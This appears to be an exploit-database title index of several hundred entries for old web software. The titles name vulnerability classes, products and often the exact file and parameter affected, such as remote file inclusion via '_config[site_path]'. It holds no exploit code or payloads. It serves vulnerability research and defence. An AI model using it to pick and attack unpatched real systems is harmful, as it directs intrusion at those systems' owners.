_config[site_path] Parameter Remote File Inclusion [29415] Magic Photo Storage Website admin/list_members.php _config[site_path] Parameter Remote File Inclusion [29414] Magic Photo Storage Website admin/index.php _config[site_path] Parameter Remote File Inclusion [29413] Magic Photo Storage Website admin/delete_member.php _config[site_path] Parameter Remote File Inclusion [29412] Magic Photo Storage Website admin/approve_member.php _config[site_path] Parameter Remote File Inclusion [29411] Magic Photo Storage Website admin/admin_paypal_email.php _config[site_path] Parameter Remote File Inclusion [29410] Magic Photo Storage Website admin/add_templates.php _config[site_path] Parameter Remote File Inclusion [29409] Magic Photo Storage Website admin/admin_email.php _config[site_path] Parameter Remote File Inclusion [29408] Magic Photo Storage Website admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion [29407] Magic Photo Storage Website admin/admin_password.php _config[site_path] Parameter Remote File Inclusion [29354] pdirl PHP Directory Listing 1.0.4 - Cross Site Scripting Web Vulnerabilities [29304] Calacode @Mail Webmail 4.51 Filtering Engine HTML Injection Vulnerability [29299] Mini Web Shop 2.1.c View.PHP Viewcategory.PHP Cross-Site Scripting Vulnerability [29274] Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability [29238] cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities [29188] cPanel WebHost Manager 3.1 park ndomain Parameter XSS [29187] cPanel WebHost Manager 3.1 dofeaturemanager feature Parameter XSS [29186] cPanel WebHost Manager 3.1 editzone domain Parameter XSS [29185] cPanel WebHost Manager 3.1 domts2 domain Parameter XSS [29184] cPanel WebHost Manager 3.1 editpkg pkg Parameter XSS [29183] cPanel WebHost Manager 3.1 addon_configsupport.cgi supporturl Parameter XSS [29182] cPanel WebHost Manager 3.1 dochangeemail email Parameter XSS [29162] My Little Weblog 2006.11.21 0 Weblog.php Cross-Site Scripting Vulnerability [29132] WebTester 5.x Command Execution [29124] Enthrallweb eHomes result.asp Multiple Parameter XSS [29123] Enthrallweb eHomes result.asp Multiple Parameter SQL Injection [29122] Enthrallweb eHomes compareHomes.asp Multiple Parameter SQL Injection [29121] Enthrallweb eHomes homeDetail.asp AD_ID Parameter SQL Injection [29120] Enthrallweb eClassifieds dirSub.asp sid Parameter SQL Injection [29119] Enthrallweb eClassifieds dircat.asp cid Parameter SQL Injection [29118] Enthrallweb eClassifieds ad.asp Multiple Parameter SQL Injection [29081] BestWebApp Dating Site login_form.asp msg Parameter XSS [29080] BestWebApp Dating Site Login Component Multiple Field SQL Injection [29045] Selenium Web Server 1.0 XSS [29034] Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities [28995] WebTester 5.x - Multiple Vulnerabilities [28988] Roundcube Webmail 0.1 index.PHP Cross-Site Scripting Vulnerability [28981] IBM WebSphere 6.0 Faultactor Cross-Site Scripting Vulnerability [28979] DornCMS Application 1.4 - Multiple Web Vulnerabilities [28977] UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities [28975] My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities [28960] aMSN 0.98.9 Web App - Multiple Vulnerabilities [28943] FreeWebshop 2.1/2.2 index.php cat Parameter XSS [28942] FreeWebshop 2.1/2.2 index.php page Parameter Traversal Arbitrary File Access [28898] FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability [28891] Mirapoint Web Mail Expression() HTML Injection Vulnerability [28884] BlooMooWeb 1.0.9 ActiveX Control Multiple Vulnerabilities [28883] Easy Web Portal 2.1.2 - Multiple Remote File Include Vulnerabilities [28869] Web Wiz Forum 6.34/7.x Search.ASP SQL Injection Vulnerability [28854] Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection [28825] Dev Web Manager System 1.5 Index.PHP Cross-Site Scripting Vulnerability [28820] Webgenius Goop Gallery 2.0 Index.PHP Cross-Site Scripting Vulnerability [28815] H-Sphere 2.x WebShell Login.PHP Cross-Site Scripting Vulnerability [28778] ironwebmail <= 6.1.1 - Directory Traversal information disclosure vulnerability [28774] PHPWebSite 0.10.2 PHPWS_SOURCE_DIR Parameter Multiple Remote File Include Vulnerabilities [28737] PHP Web Scripts Easy Banner Functions.PHP Remote File Include Vulnerability [28720] Web//News 1.4 Parser.PHP Remote File Include Vulnerability [28714] PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability [28708] elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities [28640] CA eSCC r8/1.0,eTrust Audit r8/1.5 Web Server Path Disclosure [28610] NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_name Parameter XSS [28609] NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_id Variable Arbitrary User Information Modification [28608] NeoSys Neon Webmail for Java 5.06/5.07 maillist Servlet Multiple Parameter SQL Injection [28607] NeoSys Neon Webmail for Java 5.06/5.07 addrlist Servlet Multiple Parameter SQL Injection [28606] NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet Arbitrary Mail Message Manipulation [28605] NeoSys Neon Webmail for Java 5.06/5.07 downloadfile Servlet Traversal Arbitrary File Access [28592] PHP-post Web Forum 0.x.1.0 pm.php replyuser Parameter XSS [28591] PHP-post Web Forum 0.x.1.0 profile.php Multiple Parameter SQL Injection [28590] Hitweb 3.0 REP_CLASS Multiple Remote File Include Vulnerabilities [28589] Web Wiz Forums 7.01 Members.ASP Cross-Site Scripting Vulnerability [28556] e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS [28554] e107 website system 0.7.5 submitnews.php Query String (PATH_INFO) Parameter XSS [28552] e107 website system 0.7.5 signup.php Query String (PATH_INFO) Parameter XSS [28551] e107 website system 0.7.5 search.php Query String (PATH_INFO) Parameter XSS [28549] e107 website system 0.7.5 news.php Query String (PATH_INFO) Parameter XSS [28548] e107 website system 0.7.5 fpw.php Query String (PATH_INFO) Parameter XSS [28547] e107 website system 0.7.5 admin.php Query String (PATH_INFO) Parameter XSS [28546] e107 website system 0.7.5 download.php Query String (PATH_INFO) Parameter XSS [28545] e107 website system 0.7.5 contact.php Query String (PATH_INFO) Parameter XSS [28489] Easy Address Book Web Server 1.2 - Remote Format String Vulnerability [28441] IwebNegar 1.1 Comments.PHP SQL Injection Vulnerability [28392] Zen Cart Web Shopping Cart 1.x autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion [28379] WEBinsta Mailing List Manager 1.3 Install3.PHP Remote File Include Vulnerability [28378] MyWebland miniBloggie 1.0 Fname Remote File Include Vulnerability [28372] Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Include Vulnerabilities [28349] TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Include Vulnerabilities [28334] Sophos Web Protection Appliance sblistpack Arbitrary Command Execution [28332] Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation [28300] Advanced Webhost Billing System 2.2.2 Contact.PHP Multiple Cross-Site Scripting Vulnerabilities [28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability [28277] Opera Web Browser 9 CSS Background URI Memory Corruption Vulnerability [28193] Webvizyon SayfalaAltList.ASP SQL Injection Vulnerability [28175] Sophos Web Protection Appliance - Multiple Vulnerabilities [28165] Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode() Null Dereference Denial of Service Vulnerability [28161] PHPWebGallery 1.x Comments.PHP Cross-site Scripting Vulnerability [28008] Adaptive Website Framework 1.11 Remote File Include Vulnerability [28005] Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection Vulnerability [27922] EVA-Web 2.1.2 index.php Multiple Parameter XSS [27921] EVA-Web 2.1.2 rubrique.php3 date Parameter XSS [27920] EVA-Web 2.1.2 article-album.php3 debut_image Parameter XSS [27899] JemWeb DownloadControl 1.0 DC.PHP SQL Injection Vulnerability [27887] SAP Web Application Server 6.x/7.0 Input Validation Vulnerability [27830] Multiple Cisco Products WebSense Content Filtering Bypass Vulnerability [27770] Blog 0.2.3/0.2.4 Mod Weblog_posting.PHP SQL Injection Vulnerability [27752] Graphite Web Unsafe Pickle Handling [27735] PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities [27716] Asterisk Recording Interface 0.7.15 Audio.PHP Information Disclosure Vulnerability [27713] Manic Web MWGuest 2.1 MWguest.PHP HTML Injection Vulnerability [27655] Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities [27651] Tiny Web Gallery 1.4 Index.PHP Cross-Site Scripting Vulnerability [27641] Opera Web Browser 8.52 Stylesheet Attribute Buffer Overflow Vulnerability [27607] MiniWeb (Build 300) Arbitrary File Upload [27590] APT-webshop 3.0/4.0 Modules.PHP Multiple SQL Injection Vulnerabilities [27588] PhpWebGallery 1.4.1 picture.php Multiple Parameter XSS [27587] PhpWebGallery 1.4.1 category.php Multiple Parameter XSS [27583] TalentSoft Web+ Shop 5.0 Deptname Parameter Cross-Site Scripting Vulnerability [27582] AWeb's Banner Generator 3.0 Cross-Site Scripting Vulnerability [27562] Web-APP.net WebAPP 0.9.x mods/calendar/index.cgi vsSD Parameter XSS [27561] Web-APP.net WebAPP 0.9.x index.cgi Multiple Parameter XSS [27560] aWebNews 1.2 visview.php _GET['cid'] Parameter SQL Injection [27554] MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter) [27487] Web Host Automation Ltd. Helm 3.2.10 beta default.asp Multiple Parameter XSS [27486] Web Host Automation Ltd. Helm 3.2.10 beta domains.asp txtDomainName Parameter XSS [27478] Maian Weblog 2.0 mail.php Multiple Parameter SQL Injection [27477] Maian Weblog 2.0 print.php Multiple Parameter SQL Injection [27457] 1WebCalendar 4.0 mainCal.cfm SQL Injection [27456] 1WebCalendar 4.0 /news/newsView.cfm NewsID Parameter SQL Injection [27455] 1WebCalendar 4.0 viewEvent.cfm EventID Parameter SQL Injection [27454] Motorola Bluetooth Interface Dialog Spoofing Vulnerability [27449] phpWebsite 0.8.2/0.8.3 article.php sid Parameter SQL Injection [27448] phpWebsite 0.8.2/0.8.3 friend.php sid Parameter SQL Injection [27378] Easy File Sharing Web Server 3.2 Full Path Request Arbitrary File Upload [27377] Easy File Sharing Web Server 3.2 Format String DoS [27324] Archangel Weblog 0.90.2 Authentication Bypass Vulnerability [27312] FreeHostShop Website Generator 3.3 - Arbitrary File Upload Vulnerability [27298] Web Calendar Pro Dropbase.PHP SQL Injection Vulnerability [27284] INSTEON Hub 2242-222 - Lack of Web and API Authentication [27266] Dragonfly CMS 9.0.6 .1 Web_Links Module Multiple Parameter XSS [27248] Webpagecity WPC easy 0 SQL Injection Vulnerability [27247] E107 Website System 0.7.2 Chatbox Plugin HTML Injection Vulnerability [27245] V-webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities [27189] WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability [27169] Webeveyn Whomp! Real Estate Manager 2005 Login SQL Injection Vulnerability [27149] Ashwebstudio Ashnews 0.83 Cross-Site Scripting Vulnerability [27136] Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities [27114] WebspotBlogging 3.0 Login.PHP SQL Injection Vulnerability [27109] Phpclanwebsite 1.23.1 BBCode IMG Tag Script Injection Vulnerability [27079] Web Host Automation Ltd. Helm 3.2.8 ForgotPassword.ASP Cross-Site Scripting Vulnerability [27064] Orjinweb Index.PHP Remote File Include Vulnerability [27063] WebWiz Forums Search_form.ASP Cross-Site Scripting Vulnerability [27037] TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities [27017] Chimera Web Portal 0.2 linkcategory.php id Parameter SQL Injection [27016] Chimera Web Portal 0.2 modules.php Multiple Parameter XSS [27000] VEGO Web Forum 1.x Theme_ID SQL Injection Vulnerability [26991] Web Wiz Multiple Products SQL Injection Vulnerability [26984] IceWarp Universal WebMail /mail/include.html - Crafted HTTP_USER_AGENT Arbitrary File Access [26983] IceWarp Universal WebMail /mail/index.html lang_settings Parameter Remote File Inclusion [26982] IceWarp Universal WebMail /mail/settings.html Language Parameter Local File Inclusion [26981] IceWarp Universal WebMail /dir/include.html lang Parameter Local File Inclusion [26980] IceWarp Universal WebMail /admin/inc/include.php Multiple Parameter Remote File Inclusion [26979] IceWarp Universal WebMail /accounts/inc/include.php Multiple Parameter Remote File Inclusion [26978] Dev Web Management System 1.5 add.php Multiple Parameter XSS [26977] Dev Web Management System 1.5 download_now.php target Parameter SQL Injection [26976] Dev Web Management System 1.5 getfile.php cat Parameter SQL Injection [26882] Hot Banana Web Content Management Suite 5.3 Cross-Site Scripting Vulnerability [26866] Round Cube Webmail 0.1 -20051021 Path Disclosure Weakness [26865] WebCal 3.0 4 webcal.cgi Multiple Parameter XSS [26864] WebGlimpse 2.x Cross-Site Scripting Vulnerability [26841] MarmaraWeb E-Commerce Remote File Include Vulnerability [26838] MarmaraWeb E-commerce index.php page Parameter XSS [26812] PHP Web Scripts Ad Manager Pro 2.0 Advertiser_statistic.PHP SQL Injection Vulnerability [26792] PhpWebGallery 1.3.4/1.5.1 picture.php image_id Parameter SQL Injection [26791] PhpWebGallery 1.3.4/1.5.1 category.php search Parameter SQL Injection [26790] PhpWebGallery 1.3.4/1.5.1 comments.php Multiple Parameter SQL Injection [26784] BTGrup Admin WebController SQL Injection Vulnerability [26730] Web4Future Portal Solutions Arhiva.PHP Directory Traversal Vulnerability [26729] Web4Future Affiliate Manager PRO 4.1 Functions.PHP SQL Injection Vulnerability [26728] Web4Future Portal Solutions Comentarii.PHP SQL Injection Vulnerability [26727] Web4Future eDating Professional 5.0 fq.php cid Parameter SQL Injection [26726] Web4Future eDating Professional 5.0 articles.php cat Parameter SQL Injection [26725] Web4Future eDating Professional 5.0 gift.php cid Parameter SQL Injection [26724] Web4Future eDating Professional 5.0 index.php Multiple Parameter SQL Injection [26719] Web4Future eCommerce Enterprise Edition 2.1 viewbrands.php bid Parameter SQL Injection [26718] Web4Future eCommerce Enterprise Edition 2.1 index.php Multiple Parameter SQL Injection [26717] Web4Future eCommerce Enterprise Edition 2.1 view.php Multiple Parameter SQL Injection [26691] WebCalendar 1.0.1 Layers_Toggle.PHP HTTP Response Splitting Vulnerability [26687] WebCalendar 1.0.1 - Multiple SQL Injection Vulnerabilities [26664] Multiple D-Link Devices - OS-Command Injection via UPnP Interface [26636] PHP Web Statistik 1.4 Content Injection Vulnerabilities [26635] FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities [26618] AllWeb Search 3.0 - SQL Injection Vulnerability [26598] Athena PHP Website Administration 0.1 - Remote File Include Vulnerability [26583] SoftBiz Web Hosting Directory Script 1.1 email.php h_id Parameter SQL Injection [26582] SoftBiz Web Hosting Directory Script 1.1 browsecats.php cid Parameter SQL Injection [26581] SoftBiz Web Hosting Directory Script 1.1 review.php sbres_id Parameter SQL Injection [26580] SoftBiz Web Hosting Directory Script 1.1 search_result.php cid Parameter SQL Injection [26531] Opera Web Browser 8.0/8.5 HTML Form Status Bar Misrepresentation Vulnerability [26500] PHPWebThings 1.4 Download.PHP File Parameter SQL Injection Vulnerability [26488] SAP Web Application Server 6.x/7.0 URI Redirection Vulnerability [26487] SAP Web Application Server 6.x/7.0 frameset.htm sap-syscmd Parameter XSS [26486] SAP Web Application Server 6.x/7.0 Error Page XSS [26470] JPortal Web Portal 2.2.1/2.3.1 news.php id Parameter SQL Injection [26469] JPortal Web Portal 2.2.1/2.3.1 comment.php id Parameter SQL Injection [26460] Asus VideoSecurity Online 3.5 Web Server Authentication Buffer Overflow Vulnerability [26459] phpWebThings 0.4.4 Forum.PHP Cross-Site Scripting Vulnerability [26344] WebGUI 6.x Arbitrary Command Execution Vulnerability [26311] IceWarp Web Mail 5.5.1 calendar_w.html createdataCX Parameter XSS [26310] IceWarp Web Mail 5.5.1 calendar_m.html createdataCX Parameter XSS [26309] IceWarp Web Mail 5.5.1 calendar_d.html createdataCX Parameter XSS [26308] IceWarp Web Mail 5.5.1 blank.html id Parameter XSS [26270] Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities [26263] AEwebworks aeDating 3.2/4.0 Search_Result.PHP SQL Injection Vulnerability [26236] Stylemotion WEB//NEWS 1.4 print.php id Parameter SQL Injection [26235] Stylemotion WEB//NEWS 1.4 news.php Multiple Parameter SQL Injection [26234] Stylemotion WEB//NEWS 1.4 startup.php Cookie SQL Injection [26230] Microsoft IIS 5.1 WebDAV HTTP Request Source Code Disclosure Vulnerability [26201] PHPWebNotes 2.0 Api.PHP Remote File Include Vulnerability [26200] SqWebMail 5.0 .4 HTML Email IMG Tag Script Injection Vulnerability [26197] Foojan PHPWeblog Html Injection Vulnerability [26196] BEA WebLogic 7.0/8.1 Administration Console Cross-Site Scripting Vulnerability [26193] SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities [26192] SaveWebPortal 3.4 - Multiple Cross Site Scripting Vulnerabilities [26191] SaveWebPortal 3.4 - Multiple Remote File Include Vulnerabilities [26190] SaveWebPortal 3.4 Unauthorized Access Vulnerability [26152] Apple Mac OS X 10.4 Weblog Server Cross-Site Scripting Vulnerabilities [26128] Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability [26123] Java Web Start Double Quote Injection Remote Code Execution [26105] E107 Website System 0.6 Attached File Cross-Site Scripting Vulnerability [26071] NetworkActiv Web Server 1.0/2.0/3.0/3.5 Cross-Site Scripting Vulnerability [26068] Web Content Management List.php strTable Parameter XSS [26067] Web Content Management validsession.php strRootpath Parameter XSS [26032] SPI Dynamics WebInspect 5.0.196 Cross Application Script Injection Vulnerability [26009] AfterLogic WebMail Lite PHP 7.0.1 - CSRF Vulnerability [26001] Novell GroupWise 6.5 WebAccess HTML Injection Vulnerability [25995] e107 Website System 0.6 Nested BBCode URL Tag Script Injection Vulnerability [25979] Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution [25945] phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability [25914] Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability [25836] Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution [25790] WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection Vulnerability [25788] Popper Webmail 1.41 ChildWindow.Inc.PHP Remote File Include Vulnerability [25787] LiteWeb Server 2.5 Authentication Bypass Vulnerability [25781] NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability [25739] BEA WebLogic 7.0/8.1 Administration Console Error Page Cross-Site Scripting Vulnerability [25738] BEA WebLogic 7.0/8.1 Administration Console LoginForm.jsp Cross-Site Scripting Vulnerability [25715] HP LaserJet Pro P1606dn - Webadmin Password Reset [25713] SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE [25709] Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability [25668] Sigma ISP Manager 6.6 Sigmaweb.DLL SQL Injection Vulnerability [25651] MaxWebPortal 1.3x post.asp Multiple Parameter XSS [25645] e107 Website System 0.617 Forum_viewforum.PHP SQL Injection Vulnerability [25644] e107 Website System 0.617 Request.PHP Directory Traversal Vulnerability [25626] 4D WebStar 5.3/5.4 Tomcat Plugin Remote Buffer Overflow Vulnerability [25592] WebCrossing WebX 5.0 Cross-Site Scripting Vulnerability [25589] MaxWebPortal 1.3 custom_link.asp Multiple Parameter SQL Injection [25588] MaxWebPortal 1.3 dl_toprated.asp SQL Injection [25587] MaxWebPortal 1.3 pic_popular.asp SQL Injection [25586] MaxWebPortal 1.3 links_popular.asp SQL Injection [25585] MaxWebPortal 1.3 dl_popular.asp SQL Injection [25573] Video Cam Server 1.0 Administrative Interface Authentication Bypass Vulnerability [25567] Just William's Amazon Webstore HTTP Response Splitting Vulnerability [25566] Just William's Amazon Webstore CurrentNumber Parameter Cross-Site Scripting Vulnerability [25565] Just William's Amazon Webstore SearchFor Parameter Cross-Site Scripting Vulnerability [25564] Just William's Amazon Webstore CurrentIsExpanded Parameter Cross-Site Scripting Vulnerability [25563] Oracle Application Server 9i Webcache PartialPageErrorPage Cross-Site Scripting Vulnerability [25562] Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting Vulnerability [25561] Oracle Application Server 9i Webcache Arbitrary File Corruption Vulnerability [25560] Just William's Amazon Webstore Closeup.PHP Image Parameter Cross-Site Scripting Vulnerability [25546] BEA WebLogic Server 8.1 And WebLogic Express Administration Console Cross-Site Scripting Vulnerability [25534] SQWebmail 3.x/4.0 HTTP Response Splitting Vulnerability [25421] RSA Security RSA Authentication Agent For Web 5.2 - Remote Cross-Site Scripting Vulnerability [25420] IBM WebSphere 5.0/5.1/6.0 Application Server Web Server Root JSP Source Code Disclosure Vulnerability [25418] MiniWeb MiniWeb HTTP Server (build 300) - Crash PoC [25381] WebCT Discussion Board 4.1 HTML Injection Vulnerability [25360] PHP-Nuke 7.6 Web_Links Module Multiple SQL Injection Vulnerabilities [25353] IBM Lotus Domino Server 6.5.1 Web Service Remote Denial of Service Vulnerability [25350] WebWasher CSM 4.4.1 Build 752 Conf Script Cross-Site Scripting Vulnerability [25342] PHP-Nuke 7.6 Web_Links Module Multiple Cross-Site Scripting Vulnerabilities [25319] FastStone 4in1 Browser 1.2 Web Server Remote Directory Traversal Vulnerability [25274] Maxthon Web Browser 1.2 Search Bar Information Disclosure Vulnerability [25249] Webid 1.0.6 - Multiple Vulnerabilities [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25207] py software active webcam webserver 4.3/5.5 - Multiple Vulnerabilities [25193] Jason Hines PHPWebLog 0.4/0.5 - Remote File Include Vulnerability [25163] CIS WebServer 3.5.13 Remote Directory Traversal Vulnerability [25161] PHPWebSite 0.x Image File Processing Remote Arbitrary PHP File Upload Vulnerability [25146] OpenConnect WebConnect 6.4/6.5 jretest.html Traversal Arbitrary File Access [25133] xinkaa web station 1.0.3 - Directory Traversal vulnerability [25113] WebCalendar 0.9.45 SQL Injection Vulnerability [25084] Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability [25075] Eternal Lines Web Server 1.0 - Remote Denial of Service Vulnerability [25071] Captaris Infinite Mobile Delivery Webmail 2.6 Path Disclosure Vulnerability [25069] IceWarp Web Mail 5.3 accountsettings_add.html accountid Parameter XSS [25068] IceWarp Web Mail 5.3 login.html username Parameter XSS [25067] alt-n webadmin 3.0.2 - Multiple Vulnerabilities [25066] WebWasher Classic 2.2/2.3 HTTP CONNECT Unauthorized Access [25023] PGN2WEB 0.3 - Buffer Overflow Vulnerability [25017] UML_Utilities User-Mode Linux uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service Vulnerability [24966] Java Web Start Launcher ActiveX Control - Memory Corruption [24964] Oracle WebCenter Sites Satellite Server - HTTP Header Injection [24958] MinaliC Webserver 2.0.0 - Buffer Overflow [24953] Free Monthly Websites 2.0 - Admin Password Change [24950] KNet Web Server 1.04b - Stack Corruption BoF [24932] Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities [24905] v0pCr3w Web Shell - Remote Code Execution [24903] STUNSHELL Web Shell Remote Code Execution [24902] STUNSHELL Web Shell Remote PHP Code Execution [24897] KNet Web Server 1.04b - Buffer Overflow SEH [24843] Apple Safari Web Browser 1.x HTML Form Status Bar Misrepresentation Vulnerability [24842] IWebNegar Multiple SQL Injection Vulnerabilities [24828] Opera Web Browser 7.54 KDE KFMCLIENT Remote Command Execution Vulnerability [24822] PhpGedView 2.5/2.6 Gdbi_interface.PHP Cross-Site Scripting Vulnerability [24806] darryl burgdorf weblibs 1.0 - Directory Traversal vulnerability [24781] Mozilla Camino Web Browser 0.7/0.8 Infinite Array Sort Denial of Service Vulnerability [24780] Apple Safari Web Browser 1.x Infinite Array Sort Denial of Service Vulnerability [24771] KorWeblog 1.6.2 - Remote Directory Listing Vulnerability [24758] opera web browser 7.54 java implementation Multiple Vulnerabilities (4) [24757] opera web browser 7.54 java implementation Multiple Vulnerabilities (3) [24756] opera web browser 7.54 java implementation Multiple Vulnerabilities (2) [24755] opera web browser 7.54 java implementation Multiple Vulnerabilities (1) [24742] Web Cookbook - Multiple SQL Injection Vulnerabilities [24736] PHPWebSite 0.7.3/0.8.x/0.9.3 User Module HTTP Response Splitting Vulnerability [24730] 04webserver 1.42 Multiple Vulnerabilities [24729] webcalendar 0.9.x Multiple Vulnerabilities [24717] WebHost Automation Helm Control Panel 3.1.x Multiple Input Validation Vulnerabilities [24716] Apple Safari 1.2 Web Browser TABLE Status Bar URI Obfuscation Weakness [24713] Global Spy Software Cyber Web Filter 2 IP Filter Bypass Vulnerability [24666] Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability [24574] Webmin 1.x HTML Email Command Execution Vulnerability [24542] Rix4Web Portal - Blind SQL Injection Vulnerability [24531] Web Cookbook Multiple Vulnerability [24454] Free Monthly Websites 2.0 - Multiple Vulnerabilities [24433] php weby directory software 1.2 - Multiple Vulnerabilities [24426] Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial of Service Vulnerability [24425] phpWebsite 0.7.3/0.8.x/0.9.x Comment Module CM_pid XSS [24420] Web Animations Password Protect Multiple Input Validation Vulnerabilities [24419] Xedus Web Server 1.0 Traversal Arbitrary File Access [24418] Xedus Web Server 1.0 testgetrequest.x username Parameter XSS [24417] Xedus Web Server 1.0 test.x username Parameter XSS [24408] Web-APP.Org WebAPP 0.8/0.9.x Directory Traversal Vulnerability [24394] Opera Web Browser 7.23 JavaScript Denial of Service Vulnerability [24387] Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability [24376] Opera Web Browser 7.5 Resource Detection Weakness [24367] IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities [24363] clearswift mimesweeper for web 4.0/5.0 - Directory Traversal vulnerability [24352] Free Web Chat Initial Release Connection Saturation DoS [24351] Free Web Chat Initial Release UserManager.java Null Pointer DoS [24344] U.S. Robotics USR808054 Wireless Access Point Web Administration Denial of Service Vulnerability [24342] Webcam Corp Webcam Watchdog 4.0.1 sresult.exe Cross-Site Scripting Vulnerability [24325] Opera Web Browser 7.53 Location Replace URI Obfuscation Weakness [24321] Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution [24306] EasyWeb 1.0 FileManager Module Directory Traversal Vulnerability [24300] Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection Vulnerability [24298] Internet Software Sciences Web+Center 4.0.1 Cookie Object SQL Injection Vulnerability [24295] Adult Webmaster Script Password Disclosure Vulnerability [24291] Outblaze Webmail 0 HTML Injection Vulnerability [24289] Artmedic Webdesign Kleinanzeigen Script File Include Vulnerability [24282] Gattaca Server 2003 web.tmpl Language Variable CPU Consumption DoS [24262] Opera Web Browser 7.5x IFrame OnLoad Address Bar URL Obfuscation Weakness [24254] BasiliX Webmail 1.1 Email Header HTML Injection Vulnerability [24252] fastream netfile ftp/web server 6.5/6.7 - Directory Traversal vulnerability [24248] IBM WebSphere Caching Proxy Server 5.0 2 Denial of Service Vulnerability [24244] Netegrity IdentityMinder Web Edition 5.6 Null Byte XSS [24243] IBM Lotus Domino Server 6 - Web Access Remote Denial of Service Vulnerability [24231] ArbitroWeb PHP Proxy 0.5/0.6 Cross-Site Scripting Vulnerability [24227] SqWebMail 4.0.4 .20040524 Email Header HTML Injection Vulnerability [24214] Web Wiz Forums 7.x Registration_Rules.ASP Cross-Site Scripting Vulnerability [24197] Linksys Web Camera Software 2.10 Next_file Parameter Cross-Site Scripting Vulnerability [24177] NetWin SurgeMail 1.8/1.9/2.0,WebMail 3.1 Login Form XSS [24176] NetWin SurgeMail 1.8/1.9/2.0,WebMail 3.1 Error Message Path Disclosure [24175] Linksys Web Camera Software 2.10 Next_file Parameter File Disclosure Vulnerability [24164] Rit Research Labs TinyWeb 1.9.2 Unauthorized Script Disclosure Vulnerability [24154] "e107 website system 0.6 ""email article to a friend"" Feature XSS" [24153] e107 website system 0.6 usersettings.php avmsg Parameter XSS [24138] e107 Website System 0.5/0.6 Log.PHP HTML Injection Vulnerability [24131] dsm light web file browser 2.0 - Directory Traversal vulnerability [24124] VBulletin 1.0/2.x/3.0 Index.PHP User Interface Spoofing Weakness [24116] Internet Explorer 5,Firefox 0.8,OmniWeb 4.x URI Protocol Handler Arbitrary File Creation/Modification Vulnerability [24107] EMule Web 0.42 Control Panel Denial of Service Vulnerability [24106] Open WebMail 1.x/2.x Remote Command Execution Variant Vulnerability [24100] Adam Webb NukeJokes 1.7/2.0 Module modules.php jokeid Parameter SQL Injection [24099] Adam Webb NukeJokes 1.7/2.0 Module Multiple Parameter XSS [24097] MyWeb HTTP Server 3.3 GET Request Buffer Overflow Vulnerability [24094] SurgeLDAP 1.0 Web Administration Authentication Bypass Vulnerability [24077] Business Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability [24039] NewsTraXor Website Management Script 2.9 beta Database Disclosure Vulnerability [23999] Neon WebDAV Client Library 0.2x Format String Vulnerabilities [23997] WeBid 1.0.6 - SQL Injection Vulnerability [23993] websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities [23968] Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability [23927] Opera Web Browser 7.0 - Remote IFRAME Denial of Service Vulnerability [23925] Kerio Personal Firewall 4.0.x Web Filtering Remote Denial of Service Vulnerability [23911] Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability [23910] F-Secure BackWeb 6.31 Local Privilege Escalation Vulnerability [23907] Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability [23893] WebCT Campus Edition 3.8/4.x HTML Injection Vulnerability [23886] simple webserver 2.3-rc1 - Directory Traversal [23880] HP Web Jetadmin 7.5.2456 Remote Arbitrary Command Execution Vulnerability [23879] HP Web Jetadmin 7.5.2456 setinfo.hts Script Directory Traversal Vulnerability 